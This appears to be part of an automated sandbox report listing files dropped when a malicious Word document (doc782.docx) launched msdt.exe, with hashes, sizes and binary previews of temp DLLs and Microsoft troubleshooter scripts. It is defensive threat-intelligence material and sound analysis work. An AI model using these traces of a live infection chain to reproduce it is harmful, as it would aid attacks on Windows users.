                                                                                                                                                                                            SSDEEP:24:H7C9A+6UidkHKhKe3feI+ycuZhNt+akSKfPNnq9Wd:rLxdkAKe3m1ult+a3K9q9m
                                                                                                                                                                                            MD5:26E20DE969A81AD21D8C11428DD8D335
                                                                                                                                                                                            SHA1:D0B522B5F0B8C437683568C4ACC3CFFEF57F1196
                                                                                                                                                                                            SHA-256:6FA6A619B3D754E6ECBAF12B4801B98EE34B1E56DEA9C1942B118CF4B5393476
                                                                                                                                                                                            SHA-512:07D1DA0B64C34B3909CC2D890033647CA9120CE3778430D86736F4172F2DECEDF31C6FDA651840F747AB70B88C4ADBE764D85D3C6162495D780274253B9A1171
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:L......b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........T....c:\Users\user\AppData\Local\Temp\01rkp2ka\CSC332C869B68444DFCA3A2C61AAABD180.TMP.................o....4......6..........5.......C:\Users\user\AppData\Local\Temp\RES1B1C.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.1.r.k.p.2.k.a...d.l.l.....(.....L.e.g.a.l.C.o.p.

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\RES2969.tmp

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b2, 9 symbols
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1368
                                                                                                                                                                                            Entropy (8bit):4.076886897377885
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:H53W9o66GFmkHphKe3feI+ycuZhNHakSZPNnq9Yld:d/+FjXKe3m1ulHa3bq9YP
                                                                                                                                                                                            MD5:437DD08072E93358CBBD0EB7C0176472
                                                                                                                                                                                            SHA1:77D262C59FBA3C6B4002A9E38C829376EF60635B
                                                                                                                                                                                            SHA-256:84B9F374AB5B62DACB0079B86C28D3648BB8917B7EB3C6CCAD847A7342E475F6
                                                                                                                                                                                            SHA-512:290832204B93C94B84575B54545F69FB245676081AF572BE70AB7D8C429AB0CB094744192340EEA8E6EE1C8E8EA96A65E9DFD9937FA5BE8FCFE3E7546E6F94AE
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:L......b.............debug$S........t...................@..B.rsrc$01........X.......X...........@..@.rsrc$02........P...b...............@..@........U....c:\Users\user\AppData\Local\Temp\asaommz3\CSCAF22E0F83F3247E8BD8B234DB9985444.TMP....................&w.o...}...h............5.......C:\Users\user\AppData\Local\Temp\RES2969.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...a.s.a.o.m.m.z.3...d.l.l.....(.....L.e.g.a.l.C.

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\RES4732.tmp

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b2, 9 symbols
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1368
                                                                                                                                                                                            Entropy (8bit):4.087579112057223
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:Hm3W9oVKpkHJhKe3feI+ycuZhN9akSLPNnq9Yld:A/VCk3Ke3m1ul9a3hq9YP
                                                                                                                                                                                            MD5:7810C97B7394B23F7585151B24284EC7
                                                                                                                                                                                            SHA1:2C1AD090AB3DFA44BEB3CF426427611242647D40
                                                                                                                                                                                            SHA-256:C98816400EDFA15F7D3EE43309F7E63C986046942F3DFEB93E4C4D647A98CAAE
                                                                                                                                                                                            SHA-512:B3F4F06C3F00309A40DD15E82F21048319A84D7B1577F325DECE02482ACF139E4DAB8EC5993FCD57EBC270AAFEF31051C7F5DB32DB614A761AD3437F05C13E66
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:L......b.............debug$S........t...................@..B.rsrc$01........X.......X...........@..@.rsrc$02........P...b...............@..@........U....c:\Users\user\AppData\Local\Temp\i3ghm531\CSCC6D89D5E8D544281B069B8814BE4D14E.TMP...................T......Ed....t...........5.......C:\Users\user\AppData\Local\Temp\RES4732.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.3.g.h.m.5.3.1...d.l.l.....(.....L.e.g.a.l.C.

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\asaommz3\CSCAF22E0F83F3247E8BD8B234DB9985444.TMP

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                            File Type:MSVC .res
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):652
                                                                                                                                                                                            Entropy (8bit):3.0895003920163724
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry1ak7YnqqZPN5Dlq5J:+RI+ycuZhNHakSZPNnqX
                                                                                                                                                                                            MD5:CC7F2677166FB391007D83F88C688CA1
                                                                                                                                                                                            SHA1:AF0717ACCDF6F325737DC93AE8FFC17B46E7977F
                                                                                                                                                                                            SHA-256:120DEF284865455EA87557F01AF1118C8DD9F6BC03E733FC281EF2A636D746F4
                                                                                                                                                                                            SHA-512:E350EC8168352FA19CC9A4EC4F13A2E1E4643EB85B2EA3CD5EC0B2F20CF71162F710815DC8152F3BA8406623C0ADA6FC0D7C3A792028030A0322FA867F9A0F9C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...a.s.a.o.m.m.z.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...a.s.a.o.m.m.z.3...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\asaommz3\asaommz3.dll

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):5120
                                                                                                                                                                                            Entropy (8bit):3.782786887295759
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:64oPhmKraYZkH8KTibUyPkwjj0JeC+CFSlwYNfc1ulHa3bq:ODaAkHHoxk8ZCuNnlK
                                                                                                                                                                                            MD5:766473A4C386B81551C7D3971EC5AC33
                                                                                                                                                                                            SHA1:3CD89F9EFCC926EFCAED14A32447CF4FA5CF71C0
                                                                                                                                                                                            SHA-256:BEA495B174127D5766239B72098729676749D125123E2E495687F098C0C51A7F
                                                                                                                                                                                            SHA-512:699BE66D691484E61B92F08BA27AB563BB48D257C1FC65F65CCA086B184EC0EAEB23878C6121EE63CA5CFAB7B4DDCA6687FAB3EE95CC101DF414643272240E53
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!................>*... ...@....... ....................................@..................................)..S....@.......................`....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................ *......H....... ".............................................................."..(....*J.#(....r...p(....*..(....*2~.....(....*....0.......... ....s..... ....s...............r;..p.........(......s.............5.....".....5.....3+E...../...(.-...2.3+1...:3...+)....3...+....+...+...+...+...,...+...+......r;..p...o................ ...o.........+Y.......r=..p..o......1.r=..p..o..........+(r...p..o...........(........r...p(.........X.......i2..........(.........o........o....-.r...p....

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\i3ghm531\CSCC6D89D5E8D544281B069B8814BE4D14E.TMP

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                            File Type:MSVC .res
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):652
                                                                                                                                                                                            Entropy (8bit):3.11145665806792
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryd9ak7Ynqq2SPN5Dlq5J:+RI+ycuZhN9akSLPNnqX
                                                                                                                                                                                            MD5:E9549296A3E219BE4564CF14A090740B
                                                                                                                                                                                            SHA1:77CD8D88D1CDAB155492F98D34EDCC59AB7DB6F5
                                                                                                                                                                                            SHA-256:F79F6A4A3E7CC613B15D726492556057E4412FD788E3A3BF35297499DACCBBFD
                                                                                                                                                                                            SHA-512:E7BED82FB85D1520F3157836119F0A20F98522AA2680FF4DEA29CF32B0CF8BC5D5B62B3FA7A0C3A80BA5589097D81E83E77D5424B902C8C6EA0C4E9F667F58EE
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.3.g.h.m.5.3.1...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...i.3.g.h.m.5.3.1...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\i3ghm531\i3ghm531.dll

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):3584
                                                                                                                                                                                            Entropy (8bit):3.088648770844524
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:etGSo89pz1qlkCe745Q7GslPor9jvX5ekjV4gztkZfhy6Iv+CqzOBWI+ycuZhN9B:6dpqb927GslPyDRjyJhok1ul9a3hq
                                                                                                                                                                                            MD5:3BC757DB7B82771A228AC8E6B156076A
                                                                                                                                                                                            SHA1:E8E6F16F1469AFFB683D65208D5DF1BE4D738473
                                                                                                                                                                                            SHA-256:ED86906E5744CF340300AD2CA8F96FE0D04EF4EB01770E9B9E0FDF17F90B3A73
                                                                                                                                                                                            SHA-512:BB091D5BFF577921887F0C8CEA33B50B2C00D38A773BC6DB1A7EE6460656C1E30A95E887001631AC623D30AFE0870DC61D0642DF2BBFDB719E413FD116E495E1
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!.................%... ...@....... ....................................@..................................$..K....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H........ ..4............................................................0..6....... ....s........o....(....,..o....r...pr...po....*~....*F.r...pr...po....*..(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......t...#Blob...........W=........%3............................................................................2.+...N.B.....................0.....W.......+.............................Q.9.......... \.....P ......j...... ..

                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\doc782.LNK

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:28:53 2022, mtime=Wed Jun 8 01:50:16 2022, atime=Wed Jun 8 01:50:04 2022, length=10144, window=hide
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1045
                                                                                                                                                                                            Entropy (8bit):4.711472390862526
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:8hAdC0A0UH6CHic4FpGXQDHs+WGG3A/bYbjAA/y/lHm2NDyUDk36k3o4t2Y+xIBx:8hk+JOkKHdqA0AAKJDyg7aB6m
                                                                                                                                                                                            MD5:25480BE39C79A08C7076EA996A394D31
                                                                                                                                                                                            SHA1:2D2D42155FA93FAF073DA0A3F1257ABC2575F3B6
                                                                                                                                                                                            SHA-256:2390F6D1EB3B92CAEBBF23BD87C2F87D6DF960DA6624AC32D271D75F93797D08
                                                                                                                                                                                            SHA-512:25B330A517002DEA83F6BF9004D97D8DAFD45B6FB366F124DDDD767DE1768BBDC0AF7A5A43323636D08D47C85ABC54EE65F77C37F96A222DC9ADC398950FCA2C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:L..................F.... ....V..3...G.{.z../.]t.z...'...........................P.O. .:i.....+00.../C:\...................x.1......Ng...Users.d......L...T9.....................:......B..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....T.1.....hT....user..>.......NM..T9......S......................K.a.l.f.o.n.s.....~.1.....hT....Desktop.h.......NM..T9......Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....d.2..'...TC. .DOC782~1.DOC..H......hT...TC.............................".d.o.c.7.8.2...d.o.c.x.......R...............-.......Q...........>.S......C:\Users\user\Desktop\doc782.docx..".....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.7.8.2...d.o.c.x.........:..,.LB.)...Aw...`.......X.......855271...........!a..%.H.VZAj...-..s.........W...!a..%.H.VZAj...-..s.........W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@.

                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):64
                                                                                                                                                                                            Entropy (8bit):4.601202445739505
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:bDuMJlZIbFXCmxWKIbFXCv:bCSa6c
                                                                                                                                                                                            MD5:538F5016C24249AC1799BBBB20B4BD97
                                                                                                                                                                                            SHA1:1B0ECD98E7D3BFECA78B00528138FA8D84F35BED
                                                                                                                                                                                            SHA-256:249CC3AF3819FB4142D7A65254BD454ACF580489E19A50D71007A7E998B4A70F
                                                                                                                                                                                            SHA-512:E0E8040389BABFFD046E57AAD3ECFEE9A9171B4D00EC75EE3DF48710FC452C479692121776D17DCBCCC72E4A1CA0B6570484C007B282C9DBF05EDD34C9463EDA
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:[folders]..Templates.LNK=0..doc782.LNK=0..[misc]..doc782.LNK=0..

                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):162
                                                                                                                                                                                            Entropy (8bit):3.039103887420846
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Rl/Zd0ittlqKCxPPGdbxrPuW/qPUVq:RtZaigTPGZgW/q0q
                                                                                                                                                                                            MD5:DE9AD1CB34B9BEEDE78CB381CC573070
                                                                                                                                                                                            SHA1:BC4E47C54B28A8D1F9BE0FDBF32D2904923A1835
                                                                                                                                                                                            SHA-256:711F0F0DFD92AC6ECE1EE5E7395FD0C19C19C20827626DD9B5D69900C7D5877C
                                                                                                                                                                                            SHA-512:C136D5A08132BF9E1D7705498F2056948873F7D7914C73FE31983B7C66DBEB23850321D11D21CD5E1399D3C4ED937388BD0A5674BC0E016504F16587D9720BFF
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.pratesh................................................p.r.a.t.e.s.h.........#k.../..........T.......6C......'k...0...^.j@..jT..j`..jDB.jZR.j[k...1..........H...

                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):20
                                                                                                                                                                                            Entropy (8bit):2.8954618442383215
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:QVNliGn:Q9rn
                                                                                                                                                                                            MD5:C4F79900719F08A6F11287E3C7991493
                                                                                                                                                                                            SHA1:754325A769BE6ECCC664002CD8F6BDB0D0B8CA4D
                                                                                                                                                                                            SHA-256:625CA96CCA65A363CC76429804FF47520B103D2044BA559B11EB02AB7B4D79A8
                                                                                                                                                                                            SHA-512:0F3C498BC7680B4C9167F790CC0BE6C889354AF703ABF0547F87B78FEB0BAA9F5220691DF511192B36AD9F3F69E547E6D382833E6BC25CDB4CD2191920970C5F
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:..p.r.a.t.e.s.h.....

                                                                                                                                                                                            C:\Users\user\Desktop\~$doc782.docx

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):162
                                                                                                                                                                                            Entropy (8bit):3.039103887420846
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Rl/Zd0ittlqKCxPPGdbxrPuW/qPUVq:RtZaigTPGZgW/q0q
                                                                                                                                                                                            MD5:DE9AD1CB34B9BEEDE78CB381CC573070
                                                                                                                                                                                            SHA1:BC4E47C54B28A8D1F9BE0FDBF32D2904923A1835
                                                                                                                                                                                            SHA-256:711F0F0DFD92AC6ECE1EE5E7395FD0C19C19C20827626DD9B5D69900C7D5877C
                                                                                                                                                                                            SHA-512:C136D5A08132BF9E1D7705498F2056948873F7D7914C73FE31983B7C66DBEB23850321D11D21CD5E1399D3C4ED937388BD0A5674BC0E016504F16587D9720BFF
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Preview:.pratesh................................................p.r.a.t.e.s.h.........#k.../..........T.......6C......'k...0...^.j@..jT..j`..jDB.jZR.j[k...1..........H...

                                                                                                                                                                                            C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\DiagPackage.diagpkg

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):24702
                                                                                                                                                                                            Entropy (8bit):4.37978533849437
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:fO3MDP8m2xaqade1tXv8v/XPSwTkal+7lOaNeHdXQZvczyJuz4UnPz0Kuz+NGTEP:O5NzuCWNaEcU8mjapMVOHW
                                                                                                                                                                                            MD5:191959B4C3F91BE170B30BF5D1BC2965
                                                                                                                                                                                            SHA1:1891E3CB588516B94FDC53794DA4DF5469A4C6D0
                                                                                                                                                                                            SHA-256:8EC3A8F67BAF1E4658FC772F9F35230CA1B0318DDAF7A4C84789A329B6F7F047
                                                                                                                                                                                            SHA-512:092CC417FBFE7F6E02A60FF169209D7B60362B585CBF92521BFC71C0B378D978DFB9265A3E48C630CE6ABAB263711D71F3917FFAF51B6FD449CFC394E9D8C3A9
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:<dcmPS:DiagnosticPackage SchemaVersion="1.0" Localized="true" xmlns:dcmPS="http://www.microsoft.com/schemas/dcm/package/2007" xmlns:dcmRS="http://www.microsoft.com/schemas/dcm/resource/2007">.. <DiagnosticIdentification>.. <ID>PCW</ID>.. <Version>3.0</Version>.. </DiagnosticIdentification>.. <DisplayInformation>.. <Parameters/>.. <Name>@diagpackage.dll,-1</Name>.. <Description>@diagpackage.dll,-2</Description>.. </DisplayInformation>.. <PrivacyLink>https://go.microsoft.com/fwlink/?LinkId=534597</PrivacyLink>.. <PowerShellVersion>2.0</PowerShellVersion>.. <SupportedOSVersion clientSupported="true" serverSupported="true">6.1</SupportedOSVersion>.. <Troubleshooter>.. <Script>.. <Parameters/>.. <ProcessArchitecture>Any</ProcessArchitecture>.. <RequiresElevation>false</RequiresElevation>.. <RequiresInteractivity>true</RequiresInteractivity>.. <FileName>TS_ProgramCompatibilityWizard.ps1</FileName>.. <ExtensionPoint/>.. </Script>..

                                                                                                                                                                                            C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\DiagPackage.dll

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):66560
                                                                                                                                                                                            Entropy (8bit):6.926109943059805
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:ytBGLADXf3iFGQ+/ReBQBJJgUKZgyxMBGb:ytBGcDXvKoRqKuxgyx
                                                                                                                                                                                            MD5:6E492FFAD7267DC380363269072DC63F
                                                                                                                                                                                            SHA1:3281F69F93D181ADEE35BC9AD93B8E1F1BBF7ED3
                                                                                                                                                                                            SHA-256:456AE5D9C48A1909EE8093E5B2FAD5952987D17A0B79AAE4FFF29EB684F938A8
                                                                                                                                                                                            SHA-512:422E2A7B83250276B648510EA075645E0E297EF418564DDA3E8565882DBBCCB8C42976FDA9FCDA07A25F0F04A142E43ECB06437A7A14B5D5D994348526123E4E
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                            • Filename: 68101181_048154.img, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: doc782.docx, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: doc1712.docx, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: R346ltaP9w.rtf, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: VIP Invitation to Doha Expo 2023.docx, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: WykHEO9BQN.rtf, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: lol666 (2).bat, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: EISPv0c56U.doc, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: mjpoc_slide.doc, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: mjpoc_slide.doc, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: 05-2022-0438.doc, Detection: malicious, Browse
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.PE..d....J_A.........." ......................................................... .......K....`.......................................................... ..`...............................8............................................................................rdata..............................@..@.rsrc...`.... ......................@..@.....J_A........T...8...8........J_A........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#.......rsrc$02.... .....;A.(.j..x..)V...Zl4..w.E..J_A........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                            C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\RS_ProgramCompatibilityWizard.ps1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                            File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):50242
                                                                                                                                                                                            Entropy (8bit):4.932919499511673
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:/wugEs5GhrQzYjGBHvPbD9FZahXuDzsP6qqF8DdEakDiqeXacgcRjdhGPtQMHQF4:/c5AMHvDDf2VE+quAiMw4
                                                                                                                                                                                            MD5:EDF1259CD24332F49B86454BA6F01EAB
                                                                                                                                                                                            SHA1:7F5AA05727B89955B692014C2000ED516F65D81E
                                                                                                                                                                                            SHA-256:AB41C00808ADAD9CB3D76405A9E0AEE99FB6E654A8BF38DF5ABD0D161716DC27
                                                                                                                                                                                            SHA-512:A6762849FEDD98F274CA32EB14EC918FDBE278A332FDA170ED6D63D4C86161F2208612EB180105F238893A2D2B107228A3E7B12E75E55FDE96609C69C896EBA0
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#This is passed from the troubleshooter via 'Add-DiagRootCause'..PARAM($targetPath, $appName)....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008..#rfink - 01 Sept 2008 - rewrite to support dynamic choices....#set-psdebug -strict -trace 0....#change HKLM\Software\Windows NT\CurrentVersion\AppCompatFlags\CompatTS EnableTracing(DWORD) to 1..#if you want to enable tracing..$SpewTraceToDesktop = $false....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....#Compatibility modes..$CompatibilityModes = new-Object System.Collections.Hashtable..$CompatibilityModes.Add("Version_WIN8RTM", "WIN8RTM")..$CompatibilityModes.Add("Version_WIN7RTM", "WIN7RTM")..$CompatibilityModes.Add("Version_WINVISTA2", "VISTASP2")..$CompatibilityModes.Add("Version_WINXP3", "WINXPSP3")..$CompatibilityModes.Add("Version_MSIAUTO", "MSIAUTO")..$CompatibilityModes.Add("Version_UNKNOWN", "WINXPSP3")..$Comp

                                                                                                                                                                                            C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\TS_ProgramCompatibilityWizard.ps1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):16946
                                                                                                                                                                                            Entropy (8bit):4.860026903688885
                                                                                                                                                                                            Encrypted:false
